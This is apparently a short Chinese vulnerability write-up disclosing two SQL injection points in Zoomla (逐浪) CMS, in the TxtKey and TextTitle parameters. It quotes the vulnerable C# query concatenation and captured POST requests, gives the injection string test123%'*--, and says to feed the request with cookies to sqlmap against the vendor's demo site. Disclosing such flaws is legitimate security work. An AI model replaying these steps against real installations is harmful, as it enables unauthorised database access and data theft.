逐浪CMS通用型SQL注入两枚

注入1:
http://demo.zoomla.cn/mis/target/page.aspx
TxtKey参数
[php]
string selectedValue = this.drType.SelectedValue;

string text = this.TxtKey.Text;

this.dt = this.bll.Sel(string.Concat(new string[]

{

"ParentID=0 And Inputer='",

this.buser.GetLogin().UserName,

"' And type like '%",

selectedValue,

"%' And Title like '%",

text, //没有过滤直接带入查询,导致漏洞产生

"%'"

}), "ID desc");
[/php]
前台注册一个用户。
先到http://demo.zoomla.cn/mis/target/AddTarget.aspx
添加一个名为test123的目标
访问下面的链接:
http://demo.zoomla.cn/mis/target/page.aspx
搜索test123
z1
抓取数据包,把test123修改为test123%’*--
[php]
__VIEWSTATE=%2FwEPDwULLTEyMzkzMzg1NzcPZBYCAgMPZBYCAgcPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgExB3Rlc3QxMjNkZG7nnQ6pZXGUWElWkzGHXn71ZHNY&drType=&TxtKey=test123%’*--&Button1=%E6%90%9C%E7%B4%A2
[/php]
连着cookie丢到sqlmap即可:
z2
z3

注入点2:
http://demo.zoomla.cn/mis/addmis.aspx
title参数
[php]
protected void Button_Click(object sender, EventArgs e)

DataTable dataTable = this.bll.Sel("Title='" + this.TextTitle.Text.Trim() + "'", ""); //title参数存在注入的问题。没有过滤

…[/php]
随便输入点信息:

z4
点击确定,然后抓包
[php]
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMTY5OTMzNTg0ZGSXrsn5RKQ7H7z5jSEJzO1T2S1Tog%3D%3D&TextTitle=aaa&TextStatus=1&TextType=3&TextJoiner=a&StarDate=2013%2F10%2F24+10%3A50%3A01&EndDate=2013%2F10%2F24+10%3A50%3A04&TextContent=&BtnCommit=%E7%A1%AE%E5%AE%9A&ParentID=
[/php]
TextTitle=aaa 存在注入

带上COOKIE丢到sqlmap即可
z5
z6

发表评论